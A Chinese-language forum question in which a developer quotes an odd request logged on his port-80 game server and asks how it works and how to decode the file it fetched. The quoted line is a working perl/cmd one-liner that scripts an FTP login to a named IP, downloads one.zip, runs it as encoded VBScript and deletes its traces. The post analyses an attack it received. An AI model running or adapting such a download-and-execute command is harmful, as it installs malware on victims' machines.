有趣的HTTP请求或攻击

Question

前段时间我制作了一个像SETI @ home这样的小程序，以生成我正在工作的游戏等级。该程序有一个服务器和一个客户端。它们使用简单的协议在端口X上进行通信，当客户端在HTTP代理后面时，它们使用端口80。

打开端口80，我收到很多奇怪的HTTP请求。但是两天前我引起了我的注意：

{a few unreadable bytes that I dont know what they are}28{another byte}\perl.exe -esystem('cmd.exe /c echo open 222.91.160.59>f&echo 111>>f&echo qwe>>f&echo bin>>f&echo get one.zip>>f&echo bye>>f&ftp -s:f&cscript.exe /b /e:VBScript.Encode one.zip&del /f/q f&exit')

它创建一个登录文件，通过ftp连接到222.91.160.59，下载one.zip，断开连接，用VBScript.Encode编码并删除文件，对吗？

问题：

• 知道开头几个字节是什么？我假设请求是某种HTTP请求，因为它被发送到端口80，但它如何工作？不幸的是我无法恢复这些字节，因为我已将它们作为字符串输出，我没有将它们写在日志中......这个奇怪的请求如何在HTTP服务器中执行？
• 攻击没有成功。那天晚上我试着连接到服务器，但它已经关闭了。昨天，我发现服务器在线并下载了文件（匿名）。我想分析一下。有谁知道如何解码它？我从来没有使用过VBScript.Encode，但我认为Encode要么编码/解码又要以某种方式运行one.zip，否则该文件会使用Encode或cscript.exe中的漏洞。有人可以指导我分析文件吗？我尝试对其进行base64编码/解码，甚至部分编码/解码，但结果是不可读的。

如果你想查看one.zip的开头，这里有一个PNG：Beginning of one.zip

我认为.zip扩展并不意味着它被压缩，作者只是放了一个随机扩展，因为它直接输入到VBScript：Encode。

谢谢！